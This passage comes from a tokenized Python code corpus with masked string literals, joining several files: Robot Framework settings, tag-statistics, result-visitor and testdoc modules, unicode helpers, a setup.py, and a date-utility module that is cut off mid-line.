'<STR_LIT:\\>' ) ) : <EOL> name = name + '<STR_LIT::>' + args . pop ( <NUM_LIT:0> ) <EOL> if os . path . exists ( name ) : <EOL> name = os . path . abspath ( name ) <EOL> return name , args <EOL> def __contains__ ( self , setting ) : <EOL> return setting in self . _cli_opts <EOL> def __unicode__ ( self ) : <EOL> return '<STR_LIT:\n>' . join ( '<STR_LIT>' % ( name , self . _opts [ name ] ) <EOL> for name in sorted ( self . _opts ) ) <EOL> @ property <EOL> def output ( self ) : <EOL> return self . _get_file ( '<STR_LIT>' ) <EOL> @ property <EOL> def log ( self ) : <EOL> return self . _get_file ( '<STR_LIT>' ) <EOL> @ property <EOL> def report ( self ) : <EOL> return self . _get_file ( '<STR_LIT>' ) <EOL> @ property <EOL> def xunit ( self ) : <EOL> return self . _get_file ( '<STR_LIT>' ) <EOL> def _get_file ( self , name ) : <EOL> value = self [ name ] <EOL> return value if value != '<STR_LIT>' else None <EOL> @ property <EOL> def split_log ( self ) : <EOL> return self [ '<STR_LIT>' ] <EOL> @ property <EOL> def status_rc ( self ) : <EOL> return not self [ '<STR_LIT>' ] <EOL> class RobotSettings ( _BaseSettings ) : <EOL> _extra_cli_opts = { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) } <EOL> def is_rebot_needed ( self ) : <EOL> return not ( '<STR_LIT>' == self [ '<STR_LIT>' ] == self [ '<STR_LIT>' ] == self [ '<STR_LIT>' ] ) <EOL> def get_rebot_datasource_and_settings ( self ) : <EOL> datasource = self [ '<STR_LIT>' ] <EOL> settings = RebotSettings ( log = False ) <EOL> settings . _opts . update ( self . _opts ) <EOL> for name in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> del ( settings . _opts [ name ] ) <EOL> for name in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> settings . _opts [ name ] = [ ] <EOL> for name in [ '<STR_LIT:Name>' , '<STR_LIT>' ] : <EOL> settings . _opts [ name ] = None <EOL> settings . _opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> settings . _opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> settings . _opts [ '<STR_LIT>' ] = self [ '<STR_LIT>' ] <EOL> return datasource , settings <EOL> def _outputfile_disabled ( self , type_ , name ) : <EOL> if name == '<STR_LIT>' : <EOL> return True <EOL> return self . _opts [ '<STR_LIT>' ] == '<STR_LIT>' and type_ != '<STR_LIT>' <EOL> def _escape ( self , value ) : <EOL> return utils . escape ( value ) <EOL> class RebotSettings ( _BaseSettings ) : <EOL> _extra_cli_opts = { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) } <EOL> def _outputfile_disabled ( self , type_ , name ) : <EOL> return name == '<STR_LIT>' <EOL> def _escape ( self , value ) : <EOL> return value <EOL> @ property <EOL> def suite_config ( self ) : <EOL> return { <EOL> '<STR_LIT:name>' : self [ '<STR_LIT:Name>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : dict ( self [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] <EOL> } <EOL> @ property <EOL> def statistics_config ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> } <EOL> @ property <EOL> def log_config ( self ) : <EOL> if not self . log : <EOL> return { } <EOL> return { <EOL> '<STR_LIT:title>' : utils . html_escape ( self [ '<STR_LIT>' ] or '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _url_from_path ( self . log , self . report ) , <EOL> '<STR_LIT>' : os . path . basename ( os . path . splitext ( self . log ) [ <NUM_LIT:0> ] ) , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] <EOL> } <EOL> @ property <EOL> def report_config ( self ) : <EOL> if not self . report : <EOL> return { } <EOL> return { <EOL> '<STR_LIT:title>' : utils . html_escape ( self [ '<STR_LIT>' ] or '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _url_from_path ( self . report , self . log ) , <EOL> '<STR_LIT>' : self . _resolve_background_colors ( ) , <EOL> } <EOL> def _url_from_path ( self , source , destination ) : <EOL> if not destination : <EOL> return None <EOL> return utils . get_link_path ( destination , os . path . dirname ( source ) ) <EOL> def _resolve_background_colors ( self ) : <EOL> colors = self [ '<STR_LIT>' ] <EOL> return { '<STR_LIT>' : colors [ <NUM_LIT:0> ] , '<STR_LIT>' : colors [ <NUM_LIT:1> ] , '<STR_LIT>' : colors [ <NUM_LIT:2> ] } </s>
<s> def none_shall_pass ( who ) : <EOL> if who is not None : <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> print '<STR_LIT>' </s>
<s> import re <EOL> from robot . utils import NormalizedDict <EOL> from . criticality import Criticality <EOL> from . stats import TagStat , CombinedTagStat <EOL> from . tags import TagPatterns <EOL> class TagStatistics ( object ) : <EOL> def __init__ ( self , combined_stats ) : <EOL> self . tags = NormalizedDict ( ignore = [ '<STR_LIT:_>' ] ) <EOL> self . combined = combined_stats <EOL> def visit ( self , visitor ) : <EOL> visitor . visit_tag_statistics ( self ) <EOL> def __iter__ ( self ) : <EOL> return iter ( sorted ( self . tags . values ( ) + self . combined ) ) <EOL> class TagStatisticsBuilder ( object ) : <EOL> def __init__ ( self , criticality = None , included = None , excluded = None , <EOL> combined = None , docs = None , links = None ) : <EOL> self . _included = TagPatterns ( included ) <EOL> self . _excluded = TagPatterns ( excluded ) <EOL> self . _info = TagStatInfo ( criticality , docs , links ) <EOL> self . stats = TagStatistics ( self . _info . get_combined_stats ( combined ) ) <EOL> def add_test ( self , test ) : <EOL> self . _add_tags_to_statistics ( test ) <EOL> self . _add_to_combined_statistics ( test ) <EOL> def _add_tags_to_statistics ( self , test ) : <EOL> for tag in test . tags : <EOL> if self . _is_included ( tag ) : <EOL> if tag not in self . stats . tags : <EOL> self . stats . tags [ tag ] = self . _info . get_stat ( tag ) <EOL> self . stats . tags [ tag ] . add_test ( test ) <EOL> def _is_included ( self , tag ) : <EOL> if self . _included and not self . _included . match ( tag ) : <EOL> return False <EOL> return not self . _excluded . match ( tag ) <EOL> def _add_to_combined_statistics ( self , test ) : <EOL> for comb in self . stats . combined : <EOL> if comb . match ( test . tags ) : <EOL> comb . add_test ( test ) <EOL> class TagStatInfo ( object ) : <EOL> def __init__ ( self , criticality = None , docs = None , links = None ) : <EOL> self . _criticality = criticality or Criticality ( ) <EOL> self . _docs = [ TagStatDoc ( * doc ) for doc in docs or [ ] ] <EOL> self . _links = [ TagStatLink ( * link ) for link in links or [ ] ] <EOL> def get_stat ( self , tag ) : <EOL> return TagStat ( tag , self . get_doc ( tag ) , self . get_links ( tag ) , <EOL> self . _criticality . tag_is_critical ( tag ) , <EOL> self . _criticality . tag_is_non_critical ( tag ) ) <EOL> def get_combined_stats ( self , combined = None ) : <EOL> return [ self . get_combined_stat ( * comb ) for comb in combined or [ ] ] <EOL> def get_combined_stat ( self , pattern , name = None ) : <EOL> name = name or pattern <EOL> return CombinedTagStat ( pattern , name , self . get_doc ( name ) , <EOL> self . get_links ( name ) ) <EOL> def get_doc ( self , tag ) : <EOL> return '<STR_LIT>' . join ( doc . text for doc in self . _docs if doc . match ( tag ) ) <EOL> def get_links ( self , tag ) : <EOL> return [ link . get_link ( tag ) for link in self . _links if link . match ( tag ) ] <EOL> class TagStatDoc ( object ) : <EOL> def __init__ ( self , pattern , doc ) : <EOL> self . _matcher = TagPatterns ( pattern ) <EOL> self . text = doc <EOL> def match ( self , tag ) : <EOL> return self . _matcher . match ( tag ) <EOL> class TagStatLink ( object ) : <EOL> _match_pattern_tokenizer = re . compile ( '<STR_LIT>' ) <EOL> def __init__ ( self , pattern , link , title ) : <EOL> self . _regexp = self . _get_match_regexp ( pattern ) <EOL> self . _link = link <EOL> self . _title = title . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) <EOL> def match ( self , tag ) : <EOL> return self . _regexp . match ( tag ) is not None <EOL> def get_link ( self , tag ) : <EOL> match = self . _regexp . match ( tag ) <EOL> if not match : <EOL> return None <EOL> link , title = self . _replace_groups ( self . _link , self . _title , match ) <EOL> return link , title <EOL> def _replace_groups ( self , link , title , match ) : <EOL> for index , group in enumerate ( match . groups ( ) ) : <EOL> placefolder = '<STR_LIT>' % ( index + <NUM_LIT:1> ) <EOL> link = link . replace ( placefolder , group ) <EOL> title = title . replace ( placefolder , group ) <EOL> return link , title <EOL> def _get_match_regexp ( self , pattern ) : <EOL> pattern = '<STR_LIT>' % '<STR_LIT>' . join ( self . _yield_match_pattern ( pattern ) ) <EOL> return re . compile ( pattern , re . IGNORECASE ) <EOL> def _yield_match_pattern ( self , pattern ) : <EOL> for token in self . _match_pattern_tokenizer . split ( pattern ) : <EOL> if token . startswith ( '<STR_LIT:?>' ) : <EOL> yield '<STR_LIT>' % ( '<STR_LIT:.>' * len ( token ) ) <EOL> elif token == '<STR_LIT:*>' : <EOL> yield '<STR_LIT>' <EOL> else : <EOL> yield re . escape ( token ) </s>
<s> from robot . model import SuiteVisitor <EOL> class ResultVisitor ( SuiteVisitor ) : <EOL> def visit_result ( self , result ) : <EOL> if self . start_result ( result ) is not False : <EOL> result . suite . visit ( self ) <EOL> result . statistics . visit ( self ) <EOL> result . errors . visit ( self ) <EOL> self . end_result ( result ) <EOL> def start_result ( self , result ) : <EOL> pass <EOL> def end_result ( self , result ) : <EOL> pass <EOL> def visit_statistics ( self , stats ) : <EOL> if self . start_statistics ( stats ) is not False : <EOL> stats . total . visit ( self ) <EOL> stats . tags . visit ( self ) <EOL> stats . suite . visit ( self ) <EOL> self . end_statistics ( stats ) <EOL> def start_statistics ( self , stats ) : <EOL> pass <EOL> def end_statistics ( self , stats ) : <EOL> pass <EOL> def visit_total_statistics ( self , stats ) : <EOL> if self . start_total_statistics ( stats ) is not False : <EOL> for stat in stats : <EOL> stat . visit ( self ) <EOL> self . end_total_statistics ( stats ) <EOL> def start_total_statistics ( self , stats ) : <EOL> pass <EOL> def end_total_statistics ( self , stats ) : <EOL> pass <EOL> def visit_tag_statistics ( self , stats ) : <EOL> if self . start_tag_statistics ( stats ) is not False : <EOL> for stat in stats : <EOL> stat . visit ( self ) <EOL> self . end_tag_statistics ( stats ) <EOL> def start_tag_statistics ( self , stats ) : <EOL> pass <EOL> def end_tag_statistics ( self , stats ) : <EOL> pass <EOL> def visit_suite_statistics ( self , stats ) : <EOL> if self . start_suite_statistics ( stats ) is not False : <EOL> for stat in stats : <EOL> stat . visit ( self ) <EOL> self . end_suite_statistics ( stats ) <EOL> def start_suite_statistics ( self , stats ) : <EOL> pass <EOL> def end_suite_statistics ( self , suite_stats ) : <EOL> pass <EOL> def visit_stat ( self , stat ) : <EOL> if self . start_stat ( stat ) is not False : <EOL> self . end_stat ( stat ) <EOL> def start_stat ( self , stat ) : <EOL> pass <EOL> def end_stat ( self , stat ) : <EOL> pass <EOL> def visit_errors ( self , errors ) : <EOL> self . start_errors ( errors ) <EOL> for msg in errors : <EOL> msg . visit ( self ) <EOL> self . end_errors ( errors ) <EOL> def start_errors ( self , errors ) : <EOL> pass <EOL> def end_errors ( self , errors ) : <EOL> pass </s>
<s> USAGE = """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> from os . path import abspath , dirname <EOL> import codecs <EOL> import time <EOL> if '<STR_LIT>' not in sys . modules and __name__ == '<STR_LIT:__main__>' : <EOL> import pythonpathsetter <EOL> from robot import utils <EOL> from robot . running import TestSuite , Keyword <EOL> from robot . conf import RobotSettings <EOL> from robot . parsing import disable_curdir_processing <EOL> from robot . htmldata import HtmlFileWriter , ModelWriter , JsonWriter , TESTDOC <EOL> class TestDoc ( utils . Application ) : <EOL> def __init__ ( self ) : <EOL> utils . Application . __init__ ( self , USAGE , arg_limits = ( <NUM_LIT:2> , ) ) <EOL> def main ( self , args , title = None , ** options ) : <EOL> datasources = args [ <NUM_LIT:0> : - <NUM_LIT:1> ] <EOL> outfile = abspath ( args [ - <NUM_LIT:1> ] ) <EOL> suite = TestSuiteFactory ( datasources , ** options ) <EOL> self . _write_test_doc ( suite , outfile , title ) <EOL> self . console ( outfile ) <EOL> def _write_test_doc ( self , suite , outfile , title ) : <EOL> output = codecs . open ( outfile , '<STR_LIT:w>' , '<STR_LIT>' ) <EOL> model_writer = TestdocModelWriter ( output , suite , title ) <EOL> HtmlFileWriter ( output , model_writer ) . write ( TESTDOC ) <EOL> output . close ( ) <EOL> @ disable_curdir_processing <EOL> def TestSuiteFactory ( datasources , ** options ) : <EOL> if isinstance ( datasources , basestring ) : <EOL> datasources = [ datasources ] <EOL> return TestSuite ( datasources , RobotSettings ( options ) ) <EOL> class TestdocModelWriter ( ModelWriter ) : <EOL> def __init__ ( self , output , suite , title = None ) : <EOL> self . _output = output <EOL> self . _output_path = getattr ( output , '<STR_LIT:name>' , None ) <EOL> self . _suite = suite <EOL> self . _title = title . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) if title else suite . name <EOL> def write ( self , line ) : <EOL> self . _output . write ( '<STR_LIT>' + os . linesep ) <EOL> self . write_data ( ) <EOL> self . _output . write ( '<STR_LIT>' + os . linesep ) <EOL> def write_data ( self ) : <EOL> generated_time = time . localtime ( ) <EOL> model = { <EOL> '<STR_LIT>' : JsonConverter ( self . _output_path ) . convert ( self . _suite ) , <EOL> '<STR_LIT:title>' : self . _title , <EOL> '<STR_LIT>' : utils . format_time ( generated_time , gmtsep = '<STR_LIT:U+0020>' ) , <EOL> '<STR_LIT>' : long ( time . mktime ( generated_time ) * <NUM_LIT:1000> ) <EOL> } <EOL> JsonWriter ( self . _output ) . write_json ( '<STR_LIT>' , model ) <EOL> class JsonConverter ( object ) : <EOL> def __init__ ( self , output_path = None ) : <EOL> self . _output_path = output_path <EOL> def convert ( self , suite ) : <EOL> return self . _convert_suite ( suite ) <EOL> def _convert_suite ( self , suite ) : <EOL> return { <EOL> '<STR_LIT:source>' : suite . source or '<STR_LIT>' , <EOL> '<STR_LIT>' : self . _get_relative_source ( suite . source ) , <EOL> '<STR_LIT:id>' : suite . id , <EOL> '<STR_LIT:name>' : suite . name , <EOL> '<STR_LIT>' : suite . longname , <EOL> '<STR_LIT>' : self . _html ( suite . doc ) , <EOL> '<STR_LIT>' : [ ( n , self . _html ( v ) ) for n , v in suite . metadata . items ( ) ] , <EOL> '<STR_LIT>' : suite . get_test_count ( ) , <EOL> '<STR_LIT>' : self . _convert_suites ( suite ) , <EOL> '<STR_LIT>' : self . _convert_tests ( suite ) , <EOL> '<STR_LIT>' : list ( self . _convert_keywords ( suite ) ) <EOL> } <EOL> def _get_relative_source ( self , source ) : <EOL> if not source or not self . _output_path : <EOL> return '<STR_LIT>' <EOL> return utils . get_link_path ( source , dirname ( self . _output_path ) ) <EOL> def _html ( self , item ) : <EOL> return utils . html_format ( utils . unescape ( item ) ) <EOL> def _convert_suites ( self , suite ) : <EOL> return [ self . _convert_suite ( s ) for s in suite . suites ] <EOL> def _convert_tests ( self , suite ) : <EOL> return [ self . _convert_test ( t ) for t in suite . tests ] <EOL> def _convert_test ( self , test ) : <EOL> return { <EOL> '<STR_LIT:name>' : test . name , <EOL> '<STR_LIT>' : test . longname , <EOL> '<STR_LIT:id>' : test . id , <EOL> '<STR_LIT>' : self . _html ( test . doc ) , <EOL> '<STR_LIT>' : utils . normalize_tags ( test . tags ) , <EOL> '<STR_LIT>' : self . _get_timeout ( test . timeout ) , <EOL> '<STR_LIT>' : list ( self . _convert_keywords ( test ) ) <EOL> } <EOL> def _convert_keywords ( self , item ) : <EOL> if item . setup . name : <EOL> yield self . _convert_keyword ( item . setup , type = '<STR_LIT>' ) <EOL> for kw in getattr ( item , '<STR_LIT>' , [ ] ) : <EOL> yield self . _convert_keyword ( kw ) <EOL> if item . teardown . name : <EOL> yield self . _convert_keyword ( item . teardown , type = '<STR_LIT>' ) <EOL> def _convert_keyword ( self , kw , type = None ) : <EOL> return { <EOL> '<STR_LIT:name>' : kw . _get_name ( kw . name ) if isinstance ( kw , Keyword ) else kw . name , <EOL> '<STR_LIT>' : '<STR_LIT:U+002CU+0020>' . join ( kw . args ) , <EOL> '<STR_LIT:type>' : type or { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } [ kw . type ] <EOL> } <EOL> def _get_timeout ( self , timeout ) : <EOL> try : <EOL> tout = utils . secs_to_timestr ( utils . timestr_to_secs ( timeout . string ) ) <EOL> except ValueError : <EOL> tout = timeout . string <EOL> if timeout . message : <EOL> tout += '<STR_LIT>' + timeout . message <EOL> return tout <EOL> def testdoc_cli ( args ) : <EOL> """<STR_LIT>""" <EOL> TestDoc ( ) . execute_cli ( args ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> testdoc_cli ( sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> import sys <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> from java . lang import Object , Class <EOL> def unic ( item , * args ) : <EOL> if isinstance ( item , Object ) and not isinstance ( item , Class ) : <EOL> try : <EOL> item = item . toString ( ) <EOL> except : <EOL> return _unrepresentable_object ( item ) <EOL> return _unic ( item , * args ) <EOL> elif sys . platform == '<STR_LIT>' : <EOL> def unic ( item , * args ) : <EOL> return _unic ( item , * args ) <EOL> else : <EOL> from unicodedata import normalize <EOL> def unic ( item , * args ) : <EOL> return normalize ( '<STR_LIT>' , _unic ( item , * args ) ) <EOL> def _unic ( item , * args ) : <EOL> try : <EOL> return unicode ( item , * args ) <EOL> except UnicodeError : <EOL> try : <EOL> ascii_text = str ( item ) . encode ( '<STR_LIT>' ) <EOL> except : <EOL> return _unrepresentable_object ( item ) <EOL> else : <EOL> return unicode ( ascii_text ) <EOL> except : <EOL> return _unrepresentable_object ( item ) <EOL> def safe_repr ( item ) : <EOL> try : <EOL> return unic ( repr ( item ) ) <EOL> except UnicodeError : <EOL> return repr ( unic ( item ) ) <EOL> except : <EOL> return _unrepresentable_object ( item ) <EOL> if sys . platform == '<STR_LIT>' : <EOL> _safe_repr = safe_repr <EOL> def safe_repr ( item ) : <EOL> if isinstance ( item , list ) : <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( safe_repr ( i ) for i in item ) <EOL> ret = _safe_repr ( item ) <EOL> if isinstance ( item , unicode ) and not ret . startswith ( '<STR_LIT:u>' ) : <EOL> ret = '<STR_LIT:u>' + ret <EOL> return ret <EOL> _unrepresentable_msg = u"<STR_LIT>" <EOL> def _unrepresentable_object ( item ) : <EOL> from robot . utils . error import get_error_message <EOL> return _unrepresentable_msg % ( item . __class__ . __name__ , get_error_message ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from setuptools import setup <EOL> from os . path import join , dirname <EOL> LONG_DESCRIPION = """<STR_LIT>""" <EOL> def long_description ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return open ( join ( dirname ( __file__ ) , '<STR_LIT>' ) ) . read ( ) <EOL> except IOError : <EOL> return LONG_DESCRIPTION <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description ( ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> platforms = [ '<STR_LIT>' ] , <EOL> test_suite = '<STR_LIT>' <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> import calendar <EOL> from . filter import BaseParser , str_tuple <EOL> from . exception import CanNotFormatError , UnexpectedTypeError <EOL> bp = BaseParser . main <EOL> dp = BaseParser . parse_diff <EOL> def parse ( value ) : <EOL> return bp ( value ) <EOL> def count ( value1 , value2 ) : <EOL> _val1 , _val2 = parse ( value1 ) , parse ( value2 ) <EOL> if type ( _val1 ) == type ( _val2 ) : <EOL> return _val1 - _val2 <EOL> else : <EOL> _val1 = _val1 if isinstance ( _val1 , datetime . datetime ) else midnight ( _val1 ) <EOL> _val2 = _val2 if isinstance ( _val2 , datetime . datetime ) else midnight ( _val2 ) <EOL> return _val1 - _val2 <EOL> _date = datetime . date . today ( ) <EOL> _datetime = datetime . datetime . now ( ) <EOL> _year = _date . year <EOL> _month = _date . month <EOL> _day = _date . day <EOL> _SEVEN_DAYS = datetime . timedelta ( days = <NUM_LIT:7> ) <EOL> _ONE_DAY = datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> def today ( year = None ) : <EOL> """<STR_LIT>""" <EOL> return datetime . date ( int ( year ) , _date . month , _date . day ) if year else _date <EOL> def tomorrow ( date = None ) : <EOL> """<STR_LIT>""" <EOL> if not date : <EOL> return _date + datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> else : <EOL> current_date = parse ( date ) <EOL> return current_date + datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> def yesterday ( date = None ) : <EOL> """<STR_LIT>""" <EOL> if not date : <EOL> return _date - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> else : <EOL> current_date = parse ( date ) <EOL> return current_date - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> def daysrange ( first = None , second = None , wipe = False ) : <EOL> """<STR_LIT>""" <EOL> _first , _second = parse ( first ) , parse ( second ) <EOL> ( _start , _end ) = ( _second , _first ) if _first > _second else ( _first , _second ) <EOL> days_between = ( _end - _start ) . days <EOL> date_list = [ _end - datetime . timedelta ( days = x ) for x in range ( <NUM_LIT:0> , days_between + <NUM_LIT:1> ) ] <EOL> if wipe and len ( date_list ) >= <NUM_LIT:2> : <EOL> date_list = date_list [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> return date_list <EOL> def lastday ( year = _year , month = _month ) : <EOL> """<STR_LIT>""" <EOL> last_day = calendar . monthrange ( year , month ) [ <NUM_LIT:1> ] <EOL> return datetime . date ( year = year , month = month , day = last_day ) <EOL> def midnight ( arg = None ) : <EOL> """<STR_LIT>""" <EOL> if arg : <EOL> _arg = parse ( arg ) <EOL> if isinstance ( _arg , datetime . date ) : <EOL> return datetime . datetime . combine ( _arg , datetime . datetime . min . time ( ) ) <EOL> elif isinstance ( _arg , datetime . datetime ) : <EOL> return datetime . datetime . combine ( _arg . date ( ) , datetime . datetime . min . time ( ) ) <EOL> else : <EOL> return datetime . datetime . combine ( _date , datetime . datetime . min . time ( ) ) <EOL> def before ( base = _datetime , diff = None ) : <EOL> """<STR_LIT>""" <EOL> _base = parse ( base ) <EOL> if isinstance ( _base , datetime . date ) : <EOL> _base = midnight ( _base ) <EOL> if not diff : <EOL> return _base <EOL> result_dict = dp ( diff ) <EOL> for unit in result_dict : <EOL> _val = result_dict [ unit ] <EOL> if not _val : <EOL> continue <EOL> if unit == '<STR_LIT>' : <EOL> _base = _base . replace ( year = ( _base . year - _val ) ) <EOL> elif unit == '<STR_LIT>' : <EOL> if _base . month <= _val : <EOL> _month_diff = <NUM_LIT:12> - ( _val - _base . month ) <EOL> _base = _base . replace ( year = _base . year - <NUM_LIT:1> ) . replace ( month = _month_diff ) <EOL> else : <EOL> _base = _base . replace ( month = _base . month - _val ) <EOL> elif unit in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> _base = _base - datetime . timedelta ( ** { unit : _val } ) <EOL> return _base <EOL> def after ( base = _datetime , diff = None ) : <EOL> """<STR_LIT>""" <EOL> _base = parse ( base ) <EOL> if isinstance ( _base , datetime . date ) : <EOL> _base = midnight ( _base ) <EOL> result_dict = dp ( diff ) <EOL> for unit in result_dict : <EOL> _val = result_dict [ unit ] <EOL> if not _val : <EOL> continue <EOL> if unit == '<STR_LIT>' : <EOL> _base = _base . replace ( year = ( _base . year + _val ) ) <EOL> elif unit == '<STR_LIT>' : <EOL> if _base . month + _val <= <NUM_LIT:12> : <EOL> _base = _base . replace ( month = _base . month + _val ) <EOL> else : <EOL> _month_diff = ( _base . month + _val ) - <NUM_LIT:12> <EOL> _base = _base . replace ( year = _base . year + <NUM_LIT:1> ) . replace ( month = _month_diff ) <EOL> elif unit in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> _base = _base + datetime . timedelta ( ** { unit : _val } ) <EOL> return _base <EOL> def _datetime_to_date ( arg ) : <EOL> """<STR_LIT>""" <EOL> _arg = parse ( arg ) <EOL> if isinstance ( _arg , datetime . datetime ) : <EOL> _arg = _arg . date ( ) <EOL> return _arg <EOL> def this_week ( arg = _date , clean = False ) : <EOL> _arg = _datetime_to_date ( arg ) <EOL> return _arg - datetime . timedelta ( days = _arg . weekday ( ) ) , _arg + datetime . timedelta ( <EOL> days = <NUM_LIT:6> - _arg . weekday ( ) ) if clean else _arg + datetime . timedelta ( days = <NUM_LIT:6> - _arg . weekday ( ) ) + _ONE_DAY <EOL> def last_week ( arg = _date , clean = False ) : <EOL> this_week_tuple = this_week ( arg ) <EOL> return this_week_tuple [ <NUM_LIT:0> ] - _SEVEN_DAYS , this_week_tuple [ <NUM_LIT:1> ] - _SEVEN_DAYS if clean else this_week_tuple [ <NUM_LIT:1> ] - _SEVEN_DAYS + _ONE_DAY <EOL> def next_week ( arg = _date , clean = False ) : <EOL> this_week_tuple = this_week ( arg ) <EOL> return this_week_tuple [ <NUM_LIT:0> ] + _SEVEN_DAYS , this_week_tuple [ <NUM_LIT:1> ] + _SEVEN_DAYS if clean else this_week_tuple [ <NUM_LIT:1> ] + _SEVEN_DAYS + _ONE_DAY <EOL> def this_month ( arg = _date , clean = False ) : <EOL> _arg = _datetime_to_date ( arg ) <EOL> return datetime . date ( _arg . year , _arg . month , <NUM_LIT:1> ) , lastday ( _arg . year , _arg . month ) if clean else lastday ( _arg . year , _arg . month ) + _ONE_DAY <EOL> def last_month ( arg = _date , clean = False ) : <EOL> _arg = _datetime_to_date ( arg ) <EOL> this_month_first_day = datetime . date ( _arg . year , _arg . month , <NUM_LIT:1> ) <EOL> last_month_last_day = this_month_first_day - _ONE_DAY <EOL> last_month_first_day = datetime . date ( last_month_last_day . year , last_month_last_day . month , <NUM_LIT:1> ) <EOL> return last_month_first_day , last_month_last_day if clean else this_month_first_day <EOL> def next_month ( arg = _date , clean = False ) : <EOL> _arg = _datetime_to_date ( arg ) <EOL> this_month_last_day = lastday ( _arg . year , _arg . month ) <EOL> next_month_first_day = this_month_last_day + _ONE_DAY <EOL> next_month_last_day = lastday ( next_month_first_day . year , next_month_first_day . month ) <EOL> return next_month_first_day , next_month_last_day if clean else next_month_last_day + _ONE_DAY <EOL> def newyear ( year = None ) : <EOL> return datetime . date ( int ( year ) , <NUM_LIT:1> , <NUM_LIT:1> ) if year else datetime . date ( _year , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def valentine ( year = None ) : <EOL> return datetime . date ( int ( year ) , <NUM_LIT:2> , <NUM_LIT> ) if year else datetime . date ( _year , <NUM_LIT:2> , <NUM_LIT> ) <EOL> def fool ( year = None ) : <EOL> return datetime . date ( int ( year ) , <NUM_LIT:4> , <NUM_LIT:1> ) if year else datetime . date ( _year , <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> def christmas ( year = None ) : <EOL> return datetime . date ( int ( year ) , <NUM_LIT:12> , <NUM_LIT> ) if year else datetime . date ( _year , 